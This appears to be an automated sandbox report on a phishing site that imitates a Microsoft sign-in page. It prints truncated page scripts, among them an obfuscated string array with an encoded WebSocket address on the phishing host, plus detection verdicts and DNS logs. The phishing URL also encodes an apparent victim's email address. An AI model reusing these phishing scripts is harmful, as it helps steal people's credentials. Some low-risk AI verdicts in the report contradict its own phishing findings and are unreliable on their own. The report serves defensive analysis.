MPTY','','serializer','isPrototypeOf','closed','d3NzOi8vZmRnZmh2Y2ZkZ2ZoaGpoLmdoYXJlbG9raGFuYS5jb20vNTNjYWU2Nzc5MTczNGVjZmEzYTNhZjllNGJiOTcyYTkv','_hasParent','LxWgq','azAGt','nRmZa','Generator\x20is\x20already\x20executing.','fail','208168vhLRQP','version','then','PAfRn','hYvJn','useDeprecatedNextContext','subscribe','observed','callee','log','querySelector','nsrqo','AsyncGeneratorFunction','YWjJt','osdxX','defineProperty','\x20is\x20not\x20a\x20constructor\x20or\x20null','_socket','PlfWx','193044XkUqqc','operator','\x20as\x20a\x20prototype','string','lZGdF','IDgsE','unsubscribe','binaryType','RegExp#exec\x20called\x20on\x20incompatible\x20receiver','number','add','VfQNm','onerror','_resetState','join','contentWindow','EMLva','domain','JWMAU','5YACMeh','KOPwa','VVfyF','$<a>c','inspectSource','emit','protocol','QZqJA','@@observable','input','setTimeout','code','port2','Object','Function','splice','yiqpD','pong','Can\x27t\x20convert\x20object\x20to\x20primitive\x20value','facade','setPrototypeOf','fSWsQ','exec','status','toLocaleString','something','info','ceil','UbDyQ','style','qMqsy','Bun/','enumerable','tNPdL','getOwnPropertySymbols','withoutSetter','Incompatible\x20receiver,\x20','iIeWk','XyKjN','head','name','setInterval','ownKeys','5328805bUOItG','flush','gAgxc','onStoppedNotification','1749fOYSFM','symbol','_subscribe','versions','Object\x20is\x20not\x20iterable.','createTextNode','BSLsm','38344DNVjke','bind','6hZdQcc','str','groups','JgCxP','write','dotAll','documentElement','BROKEN_CARET','_active','91jEFebV','getter','onUnhandledError','max','REJECTION_EVENT','location','tqoNb','Node.js/','_error','
URL: https://4cd0d823-53cae677.gharelokhana.com/shared/... Model: Joe Sandbox AI	{ "risk_score": 2, "reasoning": "This appears to be a legitimate Microsoft polyfill/loader script. It implements Promise functionality and contains standard module loading logic. The only minor risk indicators are dynamic code loading patterns, but these are within expected bounds for a module loader. The code includes proper attribution and licensing information." }
/! ------------------------------------------- START OF THIRD PARTY NOTICE ----------------------------------------- * * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise. * * json2.js (2016-05-01) * https://github.gharelokhana.com/douglascrockford/JSON-js * License: Public Domain * * Provided for Informational Purposes Only * * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------ */!function(e){function n(n){for(var t,o,a=n[0],r=n[1],s=0,c=[];s<a.length;s++)o=a[s],Object.prototype.hasOwnProperty.call(i,o)&&i[o]&&c.push(i[o][0]),i[o]=0;for(t in r)Object.prototype.hasOwnProperty.call(r,t)&&(e[t]=r[t]);for(d&&d(n);c.length;)c.shift()()}var t,o={},i={2:0};function a(n){if(o[n])return o[n].exports;var t=o[n]={i:n,l:!1,exports:{}};return e[n].call(t.exports,t,t.exports,a),t.l=!0,t.exports}Function.prototype.bind\|\|(t=Array.prototype.slice,Function.prototype.bind=function(e){if("function"!=typeof this)throw new TypeError("Function.prototype.bind - what is trying to be bound is not callable");var n=t.call(arguments,1),o=n.length,i=this,a=function(){},r=function(){return n.length=o,n.push.apply(n,arguments),i.apply(a.prototype.isPrototypeOf(this)?this:e,n)};return this.prototype&&(a.prototype=this.prototype),r.prototype=new a,r}),document.head=document.head\|\|document.getElementsByTagName("head")[0],function(){function e(n){var t=this,o=0,i=null,a=[];function r(){if(a.length>0){var e=a.slice();a=[],setTimeout((function(){for(var n=0,t=e.length;n<t;++n)e[n]()}),0)}}function s(e){0===o&&(i=e,o=1,r())}function c(e){0===o&&(i=e,o=2,r())}t.then=function(n,t){return new e((function(s,c){!function(n,t,s,c){a.push((function(){var a;try{a=1===o?"function"==typeof n?n(i):i:"function"==typeof t?t(i):i}catch(r){return void c(r)}a instanceof e?a.then(s,c):2===o&&"function"!=typeof t?c(a):s(a)})),0!==o&&r()}(n,t,s,c)}))},t["catch"]=function(e){return t.then(null,e)},function(){if("function"!=typeof n)throw new TypeError("Promise: argument is not a Function object");try{n(s,c)}catch(e){c(e)}}()}function n(e,n,t,o,i){return function(a){e[n]=o?a:i?{status:"fulfilled",value:a}:{status:"rejected",reason:a},t()}}function t(t,o){return t&&t.length?new e((function(i,a){for(var r=[],s=0,c=0,d=t.length;c<d;++c){var l=t[c];if(l instanceof e){s++;var p=function(){0==--s&&i(r)};o?l.then(n(r,c,p,o),a):l.then(n(r,c,p,o,!0),n(r,c,p,o,!1))}else r[c]=l}0===s&&setTimeout((function(){i(r)}),0)})):e.resolve([])}function o(e,n){return function(){e(n)}}e.all=function(e){return t(e,!0)},e.allSettled=function(e){return t(e,!1)},e.race=function(n){return new e((function(t,i){if(n&&n.length)for(var a=0,r=n.length;a<r;++a){var s=n[a];s instanceof e?s.then(t,i):setTimeout(o(t,s),0)}}))},e.reject=function(n){return new e((function(e,t){t(n)}))},e.resolve=function(n){return n instanceof e?n:n&&"function"==typeof n.then?new e((function(e,t){n.then(e,t)})):new e((function(e){e(n)}))},window.Promise\|\|(window.Promise=e),window.Promise.all\|\|(window.Promise.all=e.all),window.Promise.allSettled\|\|(window.Promise.allSettled=e.allSettled),window.Promise.race\|\|(window.Promise.race=e.race),window.Promise.reject\|\|(window.Promise.reject=e.reject),window.Promise.resolve\|\|(window.Promise.resolve=e.resolve)}(),a.e=function(e){var n=[],t=i[e];if(0!==t)if(t)n.push(t[2]);else{var o=new Promise((function(n,o){t=i[e]=[n,o]}));n.push(t[2]=o);var r=window.ServerData,s=r&&r.loader&&r.loader.cdnRoots\|\|[],c=r&&r.slMaxRetry?r.slMaxRetry:s.length-1,d=new Error;var l=functio
URL: https://fdgfhvcfdgfhhjh.gharelokhana.com/?km=anVlc... Model: Joe Sandbox AI	{ "risk_score": 2, "reasoning": "This appears to be minified utility code implementing Promise and Iterator functionality. While minified code can be suspicious, this implementation matches standard JavaScript patterns for async operations and prototypal inheritance. No high-risk behaviors like eval(), external data transmission, or suspicious DOM manipulation are present." }
!function(){"use strict";var t=function(r,e){return t=Object.setPrototypeOf\|\|{__proto__:[]}instanceof Array&&function(t,r){t.__proto__=r}\|\|function(t,r){for(var e in r)Object.prototype.hasOwnProperty.call(r,e)&&(t[e]=r[e])},t(r,e)};function r(r,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function n(){this.constructor=r}t(r,e),r.prototype=null===e?Object.create(e):(n.prototype=e.prototype,new n)}function e(t,r,e,n){return new(e\|\|(e=Promise))((function(o,i){function u(t){try{s(n.next(t))}catch(t){i(t)}}function c(t){try{s(n.throw(t))}catch(t){i(t)}}function s(t){var r;t.done?o(t.value):(r=t.value,r instanceof e?r:new e((function(t){t(r)}))).then(u,c)}s((n=n.apply(t,r\|\|[])).next())}))}function n(t,r){var e,n,o,i,u={label:0,sent:function(){if(1&o[0])throw o[1];return o[1]},trys:[],ops:[]};return i={next:c(0),throw:c(1),return:c(2)},"function"==typeof Symbol&&(i[Symbol.iterator]=function(){return this}),i;function c(c){return function(s){return function(c){if(e)throw new TypeError("Generator is already executing.");for(;i&&(i=0,c[0]&&(u=0)),u;)try{if(e=1,n&&(o=2&c[0]?n.return:c[0]?n.throw\|\|((o=n.return)&&o.call(n),0):n.next)&&!(o=o.call(n,c[1])).done)return o;switch(n=0,o&&(c=[2&c[0],o.value]),c[0]){case 0:case 1:o=c;break;case 4:return u.label++,{value:c[1],done:!1};case 5:u.label++,n=c[1],c=[0];continue;case 7:c=u.ops.pop(),u.trys.pop();continue;default:if(!(o=u.trys,(o=o.length>0&&o[o.length-1])\|\|6!==c[0]&&2!==c[0])){u=0;continue}if(3===c[0]&&(!o\|\|c[1]>o[0]&&c[1]<o[3])){u.label=c[1];break}if(6===c[0]&&u.label<o[1]){u.label=o[1],o=c;break}if(o&&u.label<o[2]){u.label=o[2],u.ops.push(c);break}o[2]&&u.ops.pop(),u.trys.pop();continue}c=r.call(t,u)}catch(t){c=[6,t],n=0}finally{e=o=0}if(5&c[0])throw c[1];return{value:c[0]?c[1]:void 0,done:!0}}([c,s])}}}Object.create;function o(t){var r="function"==typeof Symbol&&Symbol.iterator,e=r&&t[r],n=0;if(e)return e.call(t);if(t&&"number"==typeof t.length)return{next:function(){return t&&n>=t.length&&(t=void 0),{value:t&&t[n++],done:!t}}};throw new TypeError(r?"Object is not iterable.":"Symbol.iterator is not defined.")}function i(t,r){var e="function"==typeof Symbol&&t[Symbol.iterator];if(!e)return t;var n,o,i=e.call(t),u=[];try{for(;(void 0===r\|\|r-- >0)&&!(n=i.next()).done;)u.push(n.value)}catch(t){o={error:t}}finally{try{n&&!n.done&&(e=i.return)&&e.call(i)}finally{if(o)throw o.error}}return u}function u(t,r,e){if(e\|\|2===arguments.length)for(var n,o=0,i=r.length;o<i;o++)!n&&o in r\|\|(n\|\|(n=Array.prototype.slice.call(r,0,o)),n[o]=r[o]);return t.concat(n\|\|Array.prototype.slice.call(r))}function c(t){return this instanceof c?(this.v=t,this):new c(t)}function s(t,r,e){if(!Symbol.asyncIterator)throw new TypeError("Symbol.asyncIterator is not defined.");var n,o=e.apply(t,r\|\|[]),i=[];return n={},u("next"),u("throw"),u("return",(function(t){return function(r){return Promise.resolve(r).then(t,l)}})),n[Symbol.asyncIterator]=function(){return this},n;function u(t,r){o[t]&&(n[t]=function(r){return new Promise((function(e,n){i.push([t,r,e,n])>1\|\|s(t,r)}))},r&&(n[t]=r(n[t])))}function s(t,r){try{(e=o[t](r)).value instanceof c?Promise.resolve(e.value.v).then(a,l):f(i[0][2],e)}catch(t){f(i[0][3],t)}var e}function a(t){s("next",t)}function l(t){s("throw",t)}function f(t,r){t(r),i.shift(),i.length&&s(i[0][0],i[0][1])}}function a(t){if(!Symbol.asyncIterator)throw new TypeError("Symbol.asyncIterator is not defined.");var r,e=t[Symbol.asyncIterator];return e?e.call(t):(t=o(t),r={},n("next"),n("throw"),n("return"),r[Symbol.asyncIterator]=function(){return this},r);function n(e){r[e]=t[e]&&function(r){return new Promise((function(n,o){(function(t,r,e,n){Promise.resolve(n).then((function(r){t({value:r,done:e})}),r)})(n,o,(r=t[e](r)).done,r.value)}))}}}Object.create;"function"==typeof SuppressedError&&SuppressedError;function l(t){return"function"==typeof t}var f,h=((f=function(t){return function(r){t(this),this.message=r?r.length+" errors oc
URL: https://fdgfhvcfdgfhhjh.gharelokhana.com/?km=anVlcmdlbi5zY2h3YXJ6QGNhcGVsbGFzcGFjZS5jb20=%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Troubleshooting details", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": true, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: https://4cd0d823-53cae677.gharelokhana.com/ests/2.... Model: Joe Sandbox AI	{ "risk_score": 2, "reasoning": "This appears to be a legitimate Microsoft authentication module with error handling and consent management. The code contains standard string definitions and error messages for authentication flows. No high-risk behaviors like eval() or suspicious data transmission are present. The code follows standard module pattern practices." }
!function(e){function o(t){if(n[t])return n[t].exports;var i=n[t]={exports:{},id:t,loaded:!1};return e[t].call(i.exports,i,i.exports,o),i.loaded=!0,i.exports}var n={};return o.m=e,o.c=n,o.p="",o(0)}([function(e,o,n){n(2);var t=n(1),i=n(4),r=n(5),a=i.ErrorDesc,s=i.ErrorTitle,d={};d[a.TroubleSigningIn]="Sorry, but were having trouble signing you in.",d[a.TroubleSigningOut]="Sorry, but were having trouble signing you out.",d[a.UpdateExpiredPwd_Err_OnPremSuccessCloudFail]="Your password was successfully updated, but our servers take a little time to catch up. Please try signing in again in a few minutes.",d[a.UpdateExpiredPwd_Err_ChangePasswordOnPrem]="Your organization doesn't allow you to update your password on this site. Please update it according to the method recommended by your organization, or ask your admin if you need help.",d[a.UpdateExpiredPwd_Err_ADAdminActionRequired]="We tried to update your password, but there's a problem with how your account is configured. Please contact your admin and provide the detailed error information. Unfortunately you won't be able to sign in until they fix your account.",d[a.Err_UnableToDownloadResources]="The browser is having problems downloading resources from the CDN (Content Delivery Network). Please check with your organization's system administrators to ensure that they have not blocked the resource url endpoint and that the files exists and are accessible.",d[a.Err_Corrupted_JSRuntime]="WARNING: Your browser appears to be loading unexpected scripts which are keeping this page from working correctly. This situation can happen when browser plugins try to put advertisements on the page. Try removing or disabling your browser plugin. If that doesn't help, you may be able to avoid the problem by using in-private browsing instead.",d[a.XtapAcceptMfaSettingNotConfigured]="The organization you're trying to reach needs to update their settings to let you sign in.";var l={};l[s.SignIn]="Sign in",l[s.PleaseWait]="You're all setwe just need a moment",l[s.ServerError]="Something went wrong.",l[s.WeCannotSignYouIn]="Can't sign you in",t.registerSource("str",function(e,o){var n=o.iViewId===i.PaginatedState.AdminConsentCustomerSolutionProviderError;if(e.CT_STR_Consent_Error_Header=n?"Need pre-consent":"Need admin approval",e.CT_STR_Consent_Error_Description=n?"Pre-consent is required to obtain tokens for this resource.":"{0} needs permission to access resources in your organization that only an admin can grant. Please ask an admin to grant permission to this app before you can use it.",e.CT_STR_Consent_Error_SignInAsAdmin="Have an admin account? Sign in with that account",e.CT_STR_Consent_Error_GoToCspDoc="Learn how delegated admin partners can authorize applications in customer tenants",e.CT_STR_Consent_Error_ReturnToApplication=n?"Return to the application":"Return to the application without granting consent",e.CT_STR_Consent_Error_SignInWithAnotherAccount="Sign in with another account",e.CT_STR_Consent_Error_ApprovalRequired_Header="Approval required",e.CT_STR_Consent_Error_ApprovalRequired_Description="This app requires your admin's approval to:",e.CT_STR_Consent_Error_RequestApproval_Button="Request approval",e.CT_STR_Consent_Error_Cancel_Button="Cancel",e.CT_STR_Consent_Error_RequestSent_Header=o.fIsNewAccessRequest?"Request sent":"Request pending",e.STR_Consent_CompanyName="This is a permission requested to access your data in {0}.",e.STR_Consent_PublishedByUnverified="unverified",e.STR_Consent_ApprovalJustification_Label="Enter justification for requesting this app",e.STR_Consent_ApprovalDesc_AriaLabel="Admin approval is required to access {0}. To request approval, please enter why you want this app.",e.STR_Consent_ReportSuspiciousApp_Title="Report suspicious app",e.STR_Consent_ReportSuspiciousApp_Warning="By reporting this app to Microsoft, this consent request will be terminated and no data will be shared with the developer.",e.STR_Consent_RSAOption_DontTrustTheApp="I don't trust this a
URL: https://fdgfhvcfdgfhhjh.gharelokhana.com/?km=anVlcmdlbi5zY2h3YXJ6QGNhcGVsbGFzcGFjZS5jb20=%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A Model: Joe Sandbox AI	{ "brands": [] }

URL: https://fdgfhvcfdgfhhjh.gharelokhana.com/?km=anVlcmdlbi5zY2h3YXJ6QGNhcGVsbGFzcGFjZS5jb20=%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Sorry, but we're having trouble signing you in.", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: https://fdgfhvcfdgfhhjh.gharelokhana.com/?km=anVlcmdlbi5zY2h3YXJ6QGNhcGVsbGFzcGFjZS5jb20=%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A Model: Joe Sandbox AI	{ "brands": [] }

URL: https://fdgfhvcfdgfhhjh.gharelokhana.com/?km=anVlcmdlbi5zY2h3YXJ6QGNhcGVsbGFzcGFjZS5jb20=%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Sorry, but we're having trouble signing you in.", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: https://fdgfhvcfdgfhhjh.gharelokhana.com/?km=anVlcmdlbi5zY2h3YXJ6QGNhcGVsbGFzcGFjZS5jb20=%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }

URL: https://fdgfhvcfdgfhhjh.gharelokhana.com/?km=anVlcmdlbi5zY2h3YXJ6QGNhcGVsbGFzcGFjZS5jb20=%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Sorry, but we're having trouble signing you in.", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: https://fdgfhvcfdgfhhjh.gharelokhana.com/?km=anVlcmdlbi5zY2h3YXJ6QGNhcGVsbGFzcGFjZS5jb20=%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Dec 4 15:37:18 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2673
Entropy (8bit):	3.986308090696876
Encrypted:	false
SSDEEP:	48:8vdeTa62HteidAKZdA1FehwiZUklqehZy+3:8Qvp6y
MD5:	BD37B1B13B5BFD8DF1FF76DD90AB752D
SHA1:	E226FC7097B83981CB369676ED4D254DF1C38ED0
SHA-256:	957EDE46C54E3A84AA65F3A35D7D923EA4CCE07BC8165E4D07D74B1727651508
SHA-512:	4BC7E7FEA2F98D1D4B31059DA7E38372CB6244B9F5D5AC949225A2B672CE8FFE7A66574FEE9A28E1AA09B01C2162665897C5E41841E7C96FB10930661EE15AD3
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,........jF..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............g......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Source: Yara match	File source: 1.3.id.script.csv, type: HTML
Source: Yara match	File source: 2.2.pages.csv, type: HTML
Source: Yara match	File source: 2.5.pages.csv, type: HTML
Source: Yara match	File source: 2.4.pages.csv, type: HTML
Source: Yara match	File source: 2.3.pages.csv, type: HTML

Source: 1.3.id.script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: https://fdgfhvcfdgfhhjh.gharelokhana.com/?km=anVlc... High-risk script showing multiple suspicious indicators: 1) Uses suspicious domain 'gharelokhana.com' instead of legitimate Microsoft domains 2) Contains multiple redirects and endpoints mimicking Microsoft services 3) Appears to be a sophisticated phishing attempt masquerading as Microsoft login error page 4) Contains authentication-related parameters and tokens typical of credential harvesting
Source: 1.0.id.script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: https://fdgfhvcfdgfhhjh.gharelokhana.com/?km=anVlc... This code shows multiple high-risk indicators: heavy obfuscation (using encoded strings and complex function structures), dynamic code execution patterns, and suspicious variable naming conventions. The code is intentionally obscured using hex values and nested functions, making it difficult to determine its true purpose.
Source: 1.7.id.script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: https://fdgfhvcfdgfhhjh.gharelokhana.com/?km=anVlc... High-risk script detected with multiple suspicious indicators: heavily obfuscated code using hex encoding (\x20 format), large array of encoded strings, includes suspicious WebSocket functionality, and contains references to error handling that could be used to hide malicious activity. The presence of 'unhandledRejection' and DOM manipulation capabilities adds to the risk profile.

Source: https://fdgfhvcfdgfhhjh.gharelokhana.com/?km=anVlcmdlbi5zY2h3YXJ6QGNhcGVsbGFzcGFjZS5jb20=%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A	HTTP Parser: No favicon
Source: https://fdgfhvcfdgfhhjh.gharelokhana.com/?km=anVlcmdlbi5zY2h3YXJ6QGNhcGVsbGFzcGFjZS5jb20=%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A	HTTP Parser: No favicon
Source: https://fdgfhvcfdgfhhjh.gharelokhana.com/?km=anVlcmdlbi5zY2h3YXJ6QGNhcGVsbGFzcGFjZS5jb20=%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A	HTTP Parser: No favicon

Source: https://fdgfhvcfdgfhhjh.gharelokhana.com/?km=anVlcmdlbi5zY2h3YXJ6QGNhcGVsbGFzcGFjZS5jb20=%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A	HTTP Parser: No <meta name="author".. found
Source: https://fdgfhvcfdgfhhjh.gharelokhana.com/?km=anVlcmdlbi5zY2h3YXJ6QGNhcGVsbGFzcGFjZS5jb20=%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A	HTTP Parser: No <meta name="author".. found
Source: https://fdgfhvcfdgfhhjh.gharelokhana.com/?km=anVlcmdlbi5zY2h3YXJ6QGNhcGVsbGFzcGFjZS5jb20=%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A	HTTP Parser: No <meta name="author".. found

Source: https://fdgfhvcfdgfhhjh.gharelokhana.com/?km=anVlcmdlbi5zY2h3YXJ6QGNhcGVsbGFzcGFjZS5jb20=%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A	HTTP Parser: No <meta name="copyright".. found
Source: https://fdgfhvcfdgfhhjh.gharelokhana.com/?km=anVlcmdlbi5zY2h3YXJ6QGNhcGVsbGFzcGFjZS5jb20=%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A	HTTP Parser: No <meta name="copyright".. found
Source: https://fdgfhvcfdgfhhjh.gharelokhana.com/?km=anVlcmdlbi5zY2h3YXJ6QGNhcGVsbGFzcGFjZS5jb20=%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A	HTTP Parser: No <meta name="copyright".. found

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: google.dz
Source: global traffic	DNS traffic detected: DNS query: www.google.dz
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: alvoradavisual.com.br
Source: global traffic	DNS traffic detected: DNS query: fdgfhvcfdgfhhjh.gharelokhana.com
Source: global traffic	DNS traffic detected: DNS query: 4cd0d823-53cae677.gharelokhana.com
Source: global traffic	DNS traffic detected: DNS query: c9a6baa9-53cae677.gharelokhana.com

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 4, 2024 17:37:17.498120070 CET	53	64745	1.1.1.1	192.168.2.16
Dec 4, 2024 17:37:17.501408100 CET	53	49705	1.1.1.1	192.168.2.16
Dec 4, 2024 17:37:18.241328001 CET	51119	53	192.168.2.16	1.1.1.1
Dec 4, 2024 17:37:18.241477013 CET	50375	53	192.168.2.16	1.1.1.1
Dec 4, 2024 17:37:18.476206064 CET	53	50375	1.1.1.1	192.168.2.16
Dec 4, 2024 17:37:18.477894068 CET	53	51119	1.1.1.1	192.168.2.16
Dec 4, 2024 17:37:20.559798002 CET	53	61793	1.1.1.1	192.168.2.16
Dec 4, 2024 17:37:21.009222984 CET	51220	53	192.168.2.16	1.1.1.1
Dec 4, 2024 17:37:21.009372950 CET	59662	53	192.168.2.16	1.1.1.1
Dec 4, 2024 17:37:21.155374050 CET	53	51220	1.1.1.1	192.168.2.16
Dec 4, 2024 17:37:21.257620096 CET	53	59662	1.1.1.1	192.168.2.16
Dec 4, 2024 17:37:22.166450977 CET	56053	53	192.168.2.16	1.1.1.1
Dec 4, 2024 17:37:22.166610003 CET	51876	53	192.168.2.16	1.1.1.1
Dec 4, 2024 17:37:22.308991909 CET	53	56053	1.1.1.1	192.168.2.16
Dec 4, 2024 17:37:22.309134960 CET	53	51876	1.1.1.1	192.168.2.16
Dec 4, 2024 17:37:26.515481949 CET	61715	53	192.168.2.16	1.1.1.1
Dec 4, 2024 17:37:26.515608072 CET	64877	53	192.168.2.16	1.1.1.1
Dec 4, 2024 17:37:27.526958942 CET	51134	53	192.168.2.16	1.1.1.1
Dec 4, 2024 17:37:27.527147055 CET	56302	53	192.168.2.16	1.1.1.1
Dec 4, 2024 17:37:28.510011911 CET	53	64877	1.1.1.1	192.168.2.16
Dec 4, 2024 17:37:28.511020899 CET	53	56302	1.1.1.1	192.168.2.16
Dec 4, 2024 17:37:28.522270918 CET	53	61715	1.1.1.1	192.168.2.16
Dec 4, 2024 17:37:29.213582039 CET	53	51134	1.1.1.1	192.168.2.16
Dec 4, 2024 17:37:33.669784069 CET	59290	53	192.168.2.16	1.1.1.1
Dec 4, 2024 17:37:33.670087099 CET	49952	53	192.168.2.16	1.1.1.1
Dec 4, 2024 17:37:33.812602043 CET	53	59290	1.1.1.1	192.168.2.16
Dec 4, 2024 17:37:34.003134966 CET	53	49952	1.1.1.1	192.168.2.16
Dec 4, 2024 17:37:37.330702066 CET	53	63533	1.1.1.1	192.168.2.16
Dec 4, 2024 17:37:41.160741091 CET	57019	53	192.168.2.16	1.1.1.1
Dec 4, 2024 17:37:41.160936117 CET	61794	53	192.168.2.16	1.1.1.1
Dec 4, 2024 17:37:41.393556118 CET	53	61794	1.1.1.1	192.168.2.16
Dec 4, 2024 17:37:41.400094986 CET	53	57019	1.1.1.1	192.168.2.16
Dec 4, 2024 17:37:41.404813051 CET	49215	53	192.168.2.16	1.1.1.1
